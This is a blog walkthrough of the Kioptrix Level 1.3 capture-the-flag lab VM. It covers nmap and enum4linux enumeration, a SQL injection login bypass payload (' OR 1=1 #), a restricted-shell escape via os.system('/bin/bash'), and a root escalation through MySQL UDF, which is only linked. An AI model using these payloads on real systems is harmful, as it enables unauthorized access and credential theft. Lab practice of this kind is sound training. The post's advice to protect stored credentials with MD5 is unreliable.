Level 4 time 😀😀. Hope these are getting better after doing a few of these
Done a few of these now so I hope things are getting better by now. Please let me know your thoughts in the comments.
Name: Kioptrix: Level 1.3 (#4)
Date release: 8 Feb 2012
Author: Kioptrix
Series:Kioptrix
Web page: http://www.kioptrix.com/blog/?p=604
Vulnhub: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
🔥HOST DISCOVERY 🔥
ARP
netdiscover
ping
ping 192.168.0.24
🔥PORT SCANNING🔥
TCP
nmap -sS -A -sC -sV -O -p0- 192.168.0.24 -oA nmap_tcp_full_verOSscript
UDP
nmap -sU -n 192.168.0.24 -oA nmap_udp_def
🔥 SERVICE ENUMERATION 🔥
22 - ssh
ssh 192.168.0.24
80 - http
LigGoat secure Login Copyright (c) 2013!
445 - SMB
enum4linux 192.168.0.24
======================================
| OS information on 192.168.0.24 |
======================================
[+] Got OS info for 192.168.0.24 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
=============================
| Users on 192.168.0.24 |
=============================
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
=========================================
| Share Enumeration on 192.168.0.24 |
=========================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Attempting to map shares on 192.168.0.24
//192.168.0.24/print$ Mapping: DENIED, Listing: N/A
//192.168.0.24/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
Password Complexity: Disabled
Minimum Password Length: 0
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
🔥 EXPLOITATION🔥
Starting with the webapp. Supplying the username and password fields with a tick ' gives us a SQL error suggesting SQL injection attack here.
taking this a step further using the usernames found from the enum4linux output and injecting a true MYSQL statement into the password field to try and login
Username: John
Password: ' OR 1=1 #
We can login 😎
Johns password is there for the taking.
I logged in again with the same technique to get roberts password
Not much else we can do with the LigGoat so i moved on the try and login to SSH with the creds obtained.
We can login as John :D
After trying to move around I was kicked out . The same was experience as Robert
After a while playing with the limited shell and research
Exploiting the echo command we break out into a bash shell
echo os.system(‘/bin/bash’)
🔥PRIV ESCALATION 🔥
Now we need to get root
Looking around the system and in /var/www
Inside the file checklogin.php with clear-text login creds 🗝️ 🗝️ 🗝️
Theres no root password either.
- Note - Never store creds on a system in clear-text. this will be picked up quick by someone who knows what they are doing. You can hash the value in config files using something like MD5
Now we can jump into mysql
Got a little stuck here and banged my head against a wall for a bit. I found the following guide https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
had a quick look for the file needed to do the business
looks good. followed the guide and got root 😎 😎 😎
Never underestimate and forget the power of google. Step away from the problem for a while use google. Dont give up :D
Hope this was useful.
Please follow me @shifty0g
Congratulations @shifty0g! You have completed some achievement on Steemit and have been rewarded with new badge(s) :
Award for the number of comments
Click on any badge to view your own Board of Honor on SteemitBoard.
For more information about SteemitBoard, click here
If you no longer want to receive notifications, reply to this comment with the word
STOP
Great post.. I really appreciate your work..